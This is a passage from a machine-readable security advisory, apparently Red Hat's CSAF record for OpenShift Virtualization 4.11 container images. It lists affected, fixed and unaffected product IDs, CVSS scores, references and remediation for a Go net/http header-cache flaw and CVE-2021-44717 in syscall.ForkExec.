"8Base-CNV-4.11:container-native-virtualization/virtio-win@sha256:3f4a86de5c9046c44a792a75fe056976dd6763afdba22a9aededa9ed2ab781d9_amd64", "8Base-CNV-4.11:container-native-virtualization/vm-network-latency-checkup@sha256:b7e272aa99af11856b4a2d6a7f1cea4258aef13e02e0b34c7e076b3798c8169d_amd64", ], }, ], scores: [ { cvss_v3: { attackComplexity: "LOW", attackVector: "NETWORK", availabilityImpact: "HIGH", baseScore: 7.5, baseSeverity: "HIGH", confidentialityImpact: "NONE", integrityImpact: "NONE", privilegesRequired: "NONE", scope: "UNCHANGED", userInteraction: "NONE", vectorString: "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", version: "3.1", }, products: [ "8Base-CNV-4.11:container-native-virtualization/bridge-marker@sha256:faa1f729980217c7ffefa2134d5e8d851a6fb7913be7c6edf8ab7c3277b6f53d_amd64", "8Base-CNV-4.11:container-native-virtualization/checkup-framework@sha256:055aa6e280af9bfec4c8864f4d9ed79c22bd864829cff855650ef7fed092c815_amd64", "8Base-CNV-4.11:container-native-virtualization/cluster-network-addons-operator@sha256:c7475f5f5d2c24bffc410c39168d4eba8bffa64b7e220a51291ed4e6bf053c6f_amd64", "8Base-CNV-4.11:container-native-virtualization/cnv-containernetworking-plugins@sha256:af41f3c3f2b88a74bfe29c6001ca5e472bb9673150bfc0be35ffad66a012a573_amd64", "8Base-CNV-4.11:container-native-virtualization/cnv-must-gather-rhel8@sha256:3d364b59962f15123ba6ce8b2d49b1cd38b3f1d540b3b4c0a1858e93b6cba011_amd64", "8Base-CNV-4.11:container-native-virtualization/hco-bundle-registry@sha256:b83c2f51067335600cc20a39a9d911ad110d700ef46f53e7a18af4e534a77534_amd64", "8Base-CNV-4.11:container-native-virtualization/hostpath-csi-driver-rhel8@sha256:562548cfd4fd0327e3cd25365251eed5abe1aafbf394b0a112b79039c802c3c3_amd64", "8Base-CNV-4.11:container-native-virtualization/hostpath-csi-driver@sha256:562548cfd4fd0327e3cd25365251eed5abe1aafbf394b0a112b79039c802c3c3_amd64", "8Base-CNV-4.11:container-native-virtualization/hostpath-provisioner-rhel8-operator@sha256:37cb86f8d15856f112cff0440638cd976572216a84afac2d11c8a2188f86be34_amd64", "8Base-CNV-4.11:container-native-virtualization/hostpath-provisioner-rhel8@sha256:ef1f3bfc036762d9060f490912fd1b43d9ce3b9c542a347b77f505ba92a51906_amd64", "8Base-CNV-4.11:container-native-virtualization/hyperconverged-cluster-operator@sha256:9522cee60c82b120a4dd131f6dc690786740dd85ce5e7f83171823c4b7aa93e0_amd64", "8Base-CNV-4.11:container-native-virtualization/hyperconverged-cluster-webhook-rhel8@sha256:5a70d43a90d0860ca367c004fedc7a3b82132327a9d9e6bbb1d1244cd7fddb13_amd64", "8Base-CNV-4.11:container-native-virtualization/kubemacpool@sha256:9eb14ac44a379de4a6fe8583f582b2e39fd056beeab9951cd783e31340c0ce6a_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-console-plugin@sha256:884d54355a5e3f66f2916a4fd6bb182a2450f2c6a800176befc7a74b7b5cd5c9_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-ssp-operator@sha256:989137caa24e0604c230e84a7a65b7efc38ef68ef55ffe78353c51c58dd63e14_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-cleanup-vm@sha256:b4151b401146f609a0647886845233d6bd1561aaaba72866fcad6d3f4539f950_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-copy-template@sha256:34e68039c045ac22068a557d548b420ab04cda5fa755404ee1c850aa6817747f_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-create-datavolume@sha256:56de4ec139a88c5f61a0cd87dc405e208992a9cf343cc6925094cbefb533f2ce_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-create-vm-from-template@sha256:7c16943b0da0e7c886c2cad5a87c92db111a96b842f66971862d2d81df0a92f2_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-customize@sha256:c0fd52ef347d2cd496a98ea67ed432074127cb6f86e64798f452968d26e39594_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-sysprep@sha256:da18128194e3574952655b623395d330fd82912fc598b0804762f039cd7bd713_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-modify-vm-template@sha256:4747611e2b2648b3d765e6c728d80d339a25dd20664ecc57b70a1e09d71eee64_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-operator@sha256:2c008c250adad10a90fad4a7be1825ba4d950a7fbf9134c7a08346c5e0483c26_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-wait-for-vmi-status@sha256:afe3a2b76c42e27399cb71fb3c02317e89cb5f3201f9f95ec0bfa9e74c4775c4_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-template-validator@sha256:b8122af35a7695f7cf99e4d36546920570e408cfba2b45c90ffd4dd2ddf47c77_amd64", "8Base-CNV-4.11:container-native-virtualization/libguestfs-tools@sha256:083c332bd90cb8fbb02182926985accff8ba9a4ca351a6a7c049cb173e2cea00_amd64", "8Base-CNV-4.11:container-native-virtualization/ovs-cni-marker@sha256:612d67e74b6b682ea1d6358c7e766c2c499ac747ec6778a45f289ea597da736d_amd64", "8Base-CNV-4.11:container-native-virtualization/ovs-cni-plugin@sha256:3cffc89502ab45e9b47721cbca140d7946fd8afab6f1f9c6f17c17ea24374869_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-api@sha256:e47dc1188b335a23bbaf9aec8df03fd78dc4b62b3e41f06bc67a408363016e05_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-artifacts-server@sha256:412af0af13fb583eb59bf00c544b2feef9f02bfcec9776ccce1750d781a35341_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-apiserver@sha256:6481694e07d022162c4512c3e346bd10718219c6ed78bed0bdbb759c9be3d434_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-cloner@sha256:578e2134d5a174249a374de5c26532db98fca13a571e81ac6839ba88beb19a01_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-controller@sha256:474a57191da17d55a2a4c85fc6babbf6a052a244cd6edaa8bb67cb3987be8e7c_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-importer@sha256:722bdbb1303c5c631dc574fd4d5873623f2b5cee18f14970ddd224a50c819b9f_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-operator@sha256:f2371c3df8800ed745ee00b2037c932e9889271d6b47f5fd4df72c0dd4559f70_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-uploadproxy@sha256:69fbd2dee5cad3adfd2b85584e1c095a5896346497e0a58def70806f77687386_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-uploadserver@sha256:056d9fa9dff8ba2eca829403a5d0190a3bf2767e6ab37e7b46b4cc1885e1e2df_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-controller@sha256:a07a7931e8778971d6e3a73fdd0cabb442e057505d6364d98adcfa2d088b4858_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-handler@sha256:81840626baefd6558db56a060ad37ecbd21378b3a96bfe525727f8ab64b02462_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-launcher@sha256:ca64a5d33cae1ddec96abde09f97ef0845a40bf2676a319dd3fb1f1737b1826d_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-operator@sha256:69c97e3d7f039edc5a8c7075dde0114ebdb56d62cf9e4d921b40ef3847f0c75c_amd64", "8Base-CNV-4.11:container-native-virtualization/virtio-win@sha256:3f4a86de5c9046c44a792a75fe056976dd6763afdba22a9aededa9ed2ab781d9_amd64", "8Base-CNV-4.11:container-native-virtualization/vm-network-latency-checkup@sha256:b7e272aa99af11856b4a2d6a7f1cea4258aef13e02e0b34c7e076b3798c8169d_amd64", ], }, ], threats: [ { category: "impact", details: "Moderate", }, ], title: "golang: net/http: limit growth of header canonicalization cache", }, { cve: "CVE-2021-44717", cwe: { id: "CWE-200", name: "Exposure of Sensitive Information to an Unauthorized Actor", }, discovery_date: "2021-12-09T00:00:00+00:00", flags: [ { label: "vulnerable_code_not_present", product_ids: [ "8Base-CNV-4.11:container-native-virtualization/checkup-framework@sha256:055aa6e280af9bfec4c8864f4d9ed79c22bd864829cff855650ef7fed092c815_amd64", "8Base-CNV-4.11:container-native-virtualization/cnv-must-gather-rhel8@sha256:3d364b59962f15123ba6ce8b2d49b1cd38b3f1d540b3b4c0a1858e93b6cba011_amd64", "8Base-CNV-4.11:container-native-virtualization/hco-bundle-registry@sha256:b83c2f51067335600cc20a39a9d911ad110d700ef46f53e7a18af4e534a77534_amd64", "8Base-CNV-4.11:container-native-virtualization/hostpath-csi-driver-rhel8@sha256:562548cfd4fd0327e3cd25365251eed5abe1aafbf394b0a112b79039c802c3c3_amd64", "8Base-CNV-4.11:container-native-virtualization/hostpath-csi-driver@sha256:562548cfd4fd0327e3cd25365251eed5abe1aafbf394b0a112b79039c802c3c3_amd64", "8Base-CNV-4.11:container-native-virtualization/hostpath-provisioner-rhel8-operator@sha256:37cb86f8d15856f112cff0440638cd976572216a84afac2d11c8a2188f86be34_amd64", "8Base-CNV-4.11:container-native-virtualization/hostpath-provisioner-rhel8@sha256:ef1f3bfc036762d9060f490912fd1b43d9ce3b9c542a347b77f505ba92a51906_amd64", "8Base-CNV-4.11:container-native-virtualization/hyperconverged-cluster-operator@sha256:9522cee60c82b120a4dd131f6dc690786740dd85ce5e7f83171823c4b7aa93e0_amd64", "8Base-CNV-4.11:container-native-virtualization/hyperconverged-cluster-webhook-rhel8@sha256:5a70d43a90d0860ca367c004fedc7a3b82132327a9d9e6bbb1d1244cd7fddb13_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-console-plugin@sha256:884d54355a5e3f66f2916a4fd6bb182a2450f2c6a800176befc7a74b7b5cd5c9_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-ssp-operator@sha256:989137caa24e0604c230e84a7a65b7efc38ef68ef55ffe78353c51c58dd63e14_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-cleanup-vm@sha256:b4151b401146f609a0647886845233d6bd1561aaaba72866fcad6d3f4539f950_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-copy-template@sha256:34e68039c045ac22068a557d548b420ab04cda5fa755404ee1c850aa6817747f_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-create-datavolume@sha256:56de4ec139a88c5f61a0cd87dc405e208992a9cf343cc6925094cbefb533f2ce_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-create-vm-from-template@sha256:7c16943b0da0e7c886c2cad5a87c92db111a96b842f66971862d2d81df0a92f2_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-customize@sha256:c0fd52ef347d2cd496a98ea67ed432074127cb6f86e64798f452968d26e39594_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-sysprep@sha256:da18128194e3574952655b623395d330fd82912fc598b0804762f039cd7bd713_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-modify-vm-template@sha256:4747611e2b2648b3d765e6c728d80d339a25dd20664ecc57b70a1e09d71eee64_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-operator@sha256:2c008c250adad10a90fad4a7be1825ba4d950a7fbf9134c7a08346c5e0483c26_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-wait-for-vmi-status@sha256:afe3a2b76c42e27399cb71fb3c02317e89cb5f3201f9f95ec0bfa9e74c4775c4_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-template-validator@sha256:b8122af35a7695f7cf99e4d36546920570e408cfba2b45c90ffd4dd2ddf47c77_amd64", "8Base-CNV-4.11:container-native-virtualization/libguestfs-tools@sha256:083c332bd90cb8fbb02182926985accff8ba9a4ca351a6a7c049cb173e2cea00_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-api@sha256:e47dc1188b335a23bbaf9aec8df03fd78dc4b62b3e41f06bc67a408363016e05_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-artifacts-server@sha256:412af0af13fb583eb59bf00c544b2feef9f02bfcec9776ccce1750d781a35341_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-apiserver@sha256:6481694e07d022162c4512c3e346bd10718219c6ed78bed0bdbb759c9be3d434_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-cloner@sha256:578e2134d5a174249a374de5c26532db98fca13a571e81ac6839ba88beb19a01_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-controller@sha256:474a57191da17d55a2a4c85fc6babbf6a052a244cd6edaa8bb67cb3987be8e7c_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-importer@sha256:722bdbb1303c5c631dc574fd4d5873623f2b5cee18f14970ddd224a50c819b9f_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-operator@sha256:f2371c3df8800ed745ee00b2037c932e9889271d6b47f5fd4df72c0dd4559f70_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-uploadproxy@sha256:69fbd2dee5cad3adfd2b85584e1c095a5896346497e0a58def70806f77687386_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-uploadserver@sha256:056d9fa9dff8ba2eca829403a5d0190a3bf2767e6ab37e7b46b4cc1885e1e2df_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-controller@sha256:a07a7931e8778971d6e3a73fdd0cabb442e057505d6364d98adcfa2d088b4858_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-handler@sha256:81840626baefd6558db56a060ad37ecbd21378b3a96bfe525727f8ab64b02462_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-launcher@sha256:ca64a5d33cae1ddec96abde09f97ef0845a40bf2676a319dd3fb1f1737b1826d_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-operator@sha256:69c97e3d7f039edc5a8c7075dde0114ebdb56d62cf9e4d921b40ef3847f0c75c_amd64", "8Base-CNV-4.11:container-native-virtualization/virtio-win@sha256:3f4a86de5c9046c44a792a75fe056976dd6763afdba22a9aededa9ed2ab781d9_amd64", "8Base-CNV-4.11:container-native-virtualization/vm-network-latency-checkup@sha256:b7e272aa99af11856b4a2d6a7f1cea4258aef13e02e0b34c7e076b3798c8169d_amd64", ], }, ], ids: [ { system_name: "Red Hat Bugzilla ID", text: "2030806", }, ], notes: [ { category: "description", text: "There's a flaw in golang's syscall.ForkExec() interface. An attacker who manages to first cause a file descriptor exhaustion for the process, then cause syscall.ForkExec() to be called repeatedly, could compromise data integrity and/or confidentiality in a somewhat uncontrolled way in programs linked with and using syscall.ForkExec().", title: "Vulnerability description", }, { category: "summary", text: "golang: syscall: don't close fd 0 on ForkExec error", title: "Vulnerability summary", }, { category: "other", text: "* This flaw has had the severity level set to Moderate due to the attack complexity required to exhaust file descriptors at the time ForkExec is called, plus an attacker does not necessarily have direct control over where/how data is leaked.\n\n* For Service Telemetry Framework, because the flaw's impact is lower, no update will be provided at this time for its containers.\n\n* runc shipped with Red Hat Enterprise Linux 8 and 9 are not affected by this flaw because the flaw is already patched in the shipped versions.", title: "Statement", }, { category: "general", text: "The CVSS score(s) listed for this vulnerability do not reflect the associated product's status, and are included for informational purposes to better understand the severity of this vulnerability.", title: "CVSS score applicability", }, ], product_status: { fixed: [ "8Base-CNV-4.11:container-native-virtualization/bridge-marker@sha256:faa1f729980217c7ffefa2134d5e8d851a6fb7913be7c6edf8ab7c3277b6f53d_amd64", "8Base-CNV-4.11:container-native-virtualization/cluster-network-addons-operator@sha256:c7475f5f5d2c24bffc410c39168d4eba8bffa64b7e220a51291ed4e6bf053c6f_amd64", "8Base-CNV-4.11:container-native-virtualization/cnv-containernetworking-plugins@sha256:af41f3c3f2b88a74bfe29c6001ca5e472bb9673150bfc0be35ffad66a012a573_amd64", "8Base-CNV-4.11:container-native-virtualization/kubemacpool@sha256:9eb14ac44a379de4a6fe8583f582b2e39fd056beeab9951cd783e31340c0ce6a_amd64", "8Base-CNV-4.11:container-native-virtualization/ovs-cni-marker@sha256:612d67e74b6b682ea1d6358c7e766c2c499ac747ec6778a45f289ea597da736d_amd64", "8Base-CNV-4.11:container-native-virtualization/ovs-cni-plugin@sha256:3cffc89502ab45e9b47721cbca140d7946fd8afab6f1f9c6f17c17ea24374869_amd64", ], known_not_affected: [ "8Base-CNV-4.11:container-native-virtualization/checkup-framework@sha256:055aa6e280af9bfec4c8864f4d9ed79c22bd864829cff855650ef7fed092c815_amd64", "8Base-CNV-4.11:container-native-virtualization/cnv-must-gather-rhel8@sha256:3d364b59962f15123ba6ce8b2d49b1cd38b3f1d540b3b4c0a1858e93b6cba011_amd64", "8Base-CNV-4.11:container-native-virtualization/hco-bundle-registry@sha256:b83c2f51067335600cc20a39a9d911ad110d700ef46f53e7a18af4e534a77534_amd64", "8Base-CNV-4.11:container-native-virtualization/hostpath-csi-driver-rhel8@sha256:562548cfd4fd0327e3cd25365251eed5abe1aafbf394b0a112b79039c802c3c3_amd64", "8Base-CNV-4.11:container-native-virtualization/hostpath-csi-driver@sha256:562548cfd4fd0327e3cd25365251eed5abe1aafbf394b0a112b79039c802c3c3_amd64", "8Base-CNV-4.11:container-native-virtualization/hostpath-provisioner-rhel8-operator@sha256:37cb86f8d15856f112cff0440638cd976572216a84afac2d11c8a2188f86be34_amd64", "8Base-CNV-4.11:container-native-virtualization/hostpath-provisioner-rhel8@sha256:ef1f3bfc036762d9060f490912fd1b43d9ce3b9c542a347b77f505ba92a51906_amd64", "8Base-CNV-4.11:container-native-virtualization/hyperconverged-cluster-operator@sha256:9522cee60c82b120a4dd131f6dc690786740dd85ce5e7f83171823c4b7aa93e0_amd64", "8Base-CNV-4.11:container-native-virtualization/hyperconverged-cluster-webhook-rhel8@sha256:5a70d43a90d0860ca367c004fedc7a3b82132327a9d9e6bbb1d1244cd7fddb13_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-console-plugin@sha256:884d54355a5e3f66f2916a4fd6bb182a2450f2c6a800176befc7a74b7b5cd5c9_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-ssp-operator@sha256:989137caa24e0604c230e84a7a65b7efc38ef68ef55ffe78353c51c58dd63e14_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-cleanup-vm@sha256:b4151b401146f609a0647886845233d6bd1561aaaba72866fcad6d3f4539f950_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-copy-template@sha256:34e68039c045ac22068a557d548b420ab04cda5fa755404ee1c850aa6817747f_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-create-datavolume@sha256:56de4ec139a88c5f61a0cd87dc405e208992a9cf343cc6925094cbefb533f2ce_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-create-vm-from-template@sha256:7c16943b0da0e7c886c2cad5a87c92db111a96b842f66971862d2d81df0a92f2_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-customize@sha256:c0fd52ef347d2cd496a98ea67ed432074127cb6f86e64798f452968d26e39594_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-sysprep@sha256:da18128194e3574952655b623395d330fd82912fc598b0804762f039cd7bd713_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-modify-vm-template@sha256:4747611e2b2648b3d765e6c728d80d339a25dd20664ecc57b70a1e09d71eee64_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-operator@sha256:2c008c250adad10a90fad4a7be1825ba4d950a7fbf9134c7a08346c5e0483c26_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-wait-for-vmi-status@sha256:afe3a2b76c42e27399cb71fb3c02317e89cb5f3201f9f95ec0bfa9e74c4775c4_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-template-validator@sha256:b8122af35a7695f7cf99e4d36546920570e408cfba2b45c90ffd4dd2ddf47c77_amd64", "8Base-CNV-4.11:container-native-virtualization/libguestfs-tools@sha256:083c332bd90cb8fbb02182926985accff8ba9a4ca351a6a7c049cb173e2cea00_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-api@sha256:e47dc1188b335a23bbaf9aec8df03fd78dc4b62b3e41f06bc67a408363016e05_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-artifacts-server@sha256:412af0af13fb583eb59bf00c544b2feef9f02bfcec9776ccce1750d781a35341_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-apiserver@sha256:6481694e07d022162c4512c3e346bd10718219c6ed78bed0bdbb759c9be3d434_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-cloner@sha256:578e2134d5a174249a374de5c26532db98fca13a571e81ac6839ba88beb19a01_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-controller@sha256:474a57191da17d55a2a4c85fc6babbf6a052a244cd6edaa8bb67cb3987be8e7c_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-importer@sha256:722bdbb1303c5c631dc574fd4d5873623f2b5cee18f14970ddd224a50c819b9f_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-operator@sha256:f2371c3df8800ed745ee00b2037c932e9889271d6b47f5fd4df72c0dd4559f70_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-uploadproxy@sha256:69fbd2dee5cad3adfd2b85584e1c095a5896346497e0a58def70806f77687386_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-uploadserver@sha256:056d9fa9dff8ba2eca829403a5d0190a3bf2767e6ab37e7b46b4cc1885e1e2df_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-controller@sha256:a07a7931e8778971d6e3a73fdd0cabb442e057505d6364d98adcfa2d088b4858_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-handler@sha256:81840626baefd6558db56a060ad37ecbd21378b3a96bfe525727f8ab64b02462_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-launcher@sha256:ca64a5d33cae1ddec96abde09f97ef0845a40bf2676a319dd3fb1f1737b1826d_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-operator@sha256:69c97e3d7f039edc5a8c7075dde0114ebdb56d62cf9e4d921b40ef3847f0c75c_amd64", "8Base-CNV-4.11:container-native-virtualization/virtio-win@sha256:3f4a86de5c9046c44a792a75fe056976dd6763afdba22a9aededa9ed2ab781d9_amd64", "8Base-CNV-4.11:container-native-virtualization/vm-network-latency-checkup@sha256:b7e272aa99af11856b4a2d6a7f1cea4258aef13e02e0b34c7e076b3798c8169d_amd64", ], }, references: [ { category: "self", summary: "Canonical URL", url: "https://access.redhat.com/security/cve/CVE-2021-44717", }, { category: "external", summary: "RHBZ#2030806", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2030806", }, { category: "external", summary: "https://www.cve.org/CVERecord?id=CVE-2021-44717", url: "https://www.cve.org/CVERecord?id=CVE-2021-44717", }, { category: "external", summary: "https://nvd.nist.gov/vuln/detail/CVE-2021-44717", url: "https://nvd.nist.gov/vuln/detail/CVE-2021-44717", }, { category: "external", summary: "https://groups.google.com/g/golang-announce/c/hcmEScgc00k", url: "https://groups.google.com/g/golang-announce/c/hcmEScgc00k", }, ], release_date: "2021-12-09T00:00:00+00:00", remediations: [ { category: "vendor_fix", date: "2022-09-14T19:28:51+00:00", details: "For details on how to apply this update, which includes the changes described in this advisory, refer to:\n\nhttps://access.redhat.com/articles/11258", product_ids: [ "8Base-CNV-4.11:container-native-virtualization/bridge-marker@sha256:faa1f729980217c7ffefa2134d5e8d851a6fb7913be7c6edf8ab7c3277b6f53d_amd64", "8Base-CNV-4.11:container-native-virtualization/cluster-network-addons-operator@sha256:c7475f5f5d2c24bffc410c39168d4eba8bffa64b7e220a51291ed4e6bf053c6f_amd64", "8Base-CNV-4.11:container-native-virtualization/cnv-containernetworking-plugins@sha256:af41f3c3f2b88a74bfe29c6001ca5e472bb9673150bfc0be35ffad66a012a573_amd64", "8Base-CNV-4.11:container-native-virtualization/kubemacpool@sha256:9eb14ac44a379de4a6fe8583f582b2e39fd056beeab9951cd783e31340c0ce6a_amd64", "8Base-CNV-4.11:container-native-virtualization/ovs-cni-marker@sha256:612d67e74b6b682ea1d6358c7e766c2c499ac747ec6778a45f289ea597da736d_amd64", "8Base-CNV-4.11:container-native-virtualization/ovs-cni-plugin@sha256:3cffc89502ab45e9b47721cbca140d7946fd8afab6f1f9c6f17c17ea24374869_amd64", ], restart_required: { category: "none", }, url: "https://access.redhat.com/errata/RHSA-2022:6526", }, { category: "workaround", details: "This bug can be mitigated by raising the per-process file descriptor limit.", product_ids: [ "8Base-CNV-4.11:container-native-virtualization/bridge-marker@sha256:faa1f729980217c7ffefa2134d5e8d851a6fb7913be7c6edf8ab7c3277b6f53d_amd64", "8Base-CNV-4.11:container-native-virtualization/checkup-framework@sha256:055aa6e280af9bfec4c8864f4d9ed79c22bd864829cff855650ef7fed092c815_amd64", "8Base-CNV-4.11:container-native-virtualization/cluster-network-addons-operator@sha256:c7475f5f5d2c24bffc410c39168d4eba8bffa64b7e220a51291ed4e6bf053c6f_amd64", "8Base-CNV-4.11:container-native-virtualization/cnv-containernetworking-plugins@sha256:af41f3c3f2b88a74bfe29c6001ca5e472bb9673150bfc0be35ffad66a012a573_amd64", "8Base-CNV-4.11:container-native-virtualization/cnv-must-gather-rhel8@sha256:3d364b59962f15123ba6ce8b2d49b1cd38b3f1d540b3b4c0a1858e93b6cba011_amd64", "8Base-CNV-4.11:container-native-virtualization/hco-bundle-registry@sha256:b83c2f51067335600cc20a39a9d911ad110d700ef46f53e7a18af4e534a77534_amd64", "8Base-CNV-4.11:container-native-virtualization/hostpath-csi-driver-rhel8@sha256:562548cfd4fd0327e3cd25365251eed5abe1aafbf394b0a112b79039c802c3c3_amd64", "8Base-CNV-4.11:container-native-virtualization/hostpath-csi-driver@sha256:562548cfd4fd0327e3cd25365251eed5abe1aafbf394b0a112b79039c802c3c3_amd64", "8Base-CNV-4.11:container-native-virtualization/hostpath-provisioner-rhel8-operator@sha256:37cb86f8d15856f112cff0440638cd976572216a84afac2d11c8a2188f86be34_amd64", "8Base-CNV-4.11:container-native-virtualization/hostpath-provisioner-rhel8@sha256:ef1f3bfc036762d9060f490912fd1b43d9ce3b9c542a347b77f505ba92a51906_amd64", "8Base-CNV-4.11:container-native-virtualization/hyperconverged-cluster-operator@sha256:9522cee60c82b120a4dd131f6dc690786740dd85ce5e7f83171823c4b7aa93e0_amd64", "8Base-CNV-4.11:container-native-virtualization/hyperconverged-cluster-webhook-rhel8@sha256:5a70d43a90d0860ca367c004fedc7a3b82132327a9d9e6bbb1d1244cd7fddb13_amd64", "8Base-CNV-4.11:container-native-virtualization/kubemacpool@sha256:9eb14ac44a379de4a6fe8583f582b2e39fd056beeab9951cd783e31340c0ce6a_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-console-plugin@sha256:884d54355a5e3f66f2916a4fd6bb182a2450f2c6a800176befc7a74b7b5cd5c9_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-ssp-operator@sha256:989137caa24e0604c230e84a7a65b7efc38ef68ef55ffe78353c51c58dd63e14_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-cleanup-vm@sha256:b4151b401146f609a0647886845233d6bd1561aaaba72866fcad6d3f4539f950_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-copy-template@sha256:34e68039c045ac22068a557d548b420ab04cda5fa755404ee1c850aa6817747f_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-create-datavolume@sha256:56de4ec139a88c5f61a0cd87dc405e208992a9cf343cc6925094cbefb533f2ce_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-create-vm-from-template@sha256:7c16943b0da0e7c886c2cad5a87c92db111a96b842f66971862d2d81df0a92f2_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-customize@sha256:c0fd52ef347d2cd496a98ea67ed432074127cb6f86e64798f452968d26e39594_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-sysprep@sha256:da18128194e3574952655b623395d330fd82912fc598b0804762f039cd7bd713_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-modify-vm-template@sha256:4747611e2b2648b3d765e6c728d80d339a25dd20664ecc57b70a1e09d71eee64_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-operator@sha256:2c008c250adad10a90fad4a7be1825ba4d950a7fbf9134c7a08346c5e0483c26_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-wait-for-vmi-status@sha256:afe3a2b76c42e27399cb71fb3c02317e89cb5f3201f9f95ec0bfa9e74c4775c4_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-template-validator@sha256:b8122af35a7695f7cf99e4d36546920570e408cfba2b45c90ffd4dd2ddf47c77_amd64", "8Base-CNV-4.11:container-native-virtualization/libguestfs-tools@sha256:083c332bd90cb8fbb02182926985accff8ba9a4ca351a6a7c049cb173e2cea00_amd64", 